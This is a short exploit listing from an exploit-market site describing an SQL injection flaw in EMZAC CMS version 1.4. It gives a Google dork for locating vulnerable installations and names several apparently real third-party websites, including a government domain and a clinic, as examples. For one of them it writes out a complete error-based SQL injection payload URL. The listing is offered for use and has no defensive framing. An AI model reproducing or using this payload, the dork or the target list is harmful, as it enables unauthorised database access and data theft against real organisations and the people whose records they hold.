[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

EMZAC - CMS SQL Injection Vulnerability

Author
@kedil3r
Risk
[
Security Risk High
]
0day-ID
0day-ID-19286
Category
web applications
Date add
30-08-2012
Platform
php
# Exploit Title: EMZAC - CMS Sql injection
# Author: @kedil3r
# Vendor or Software Link: http://www.emzac.com
# Version: 1.4
# Category:: webapps
# Google dork: inurl:index.php?sec=
# Tested on: Bactrack
# Demo site:
the principal website are vulnerable http://www.emzac.com/index.php?sec=Sql here
Example : http://www.bioagricoladelllano.com.co/index.php?sec=13%20AND%20(SELECT%207785%20FROM(SELECT%20COUNT(*),CONCAT(0x3a6161683a,(SELECT%20(CASE%20WHEN%20(7785=7785)%20THEN%201%20ELSE%200%20END)),0x3a6f6a763a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
www.ispeak.gov.co/index.php?sec=sql here
http://www.clinicadelamujer.com.co/index.php?sec=sql here

EMZAC cms Descriptión: emzac cms is used by many government agencies and public

Gr33tz

@xdarkston3x @failsoft



#  0day.today [2024-12-25]  #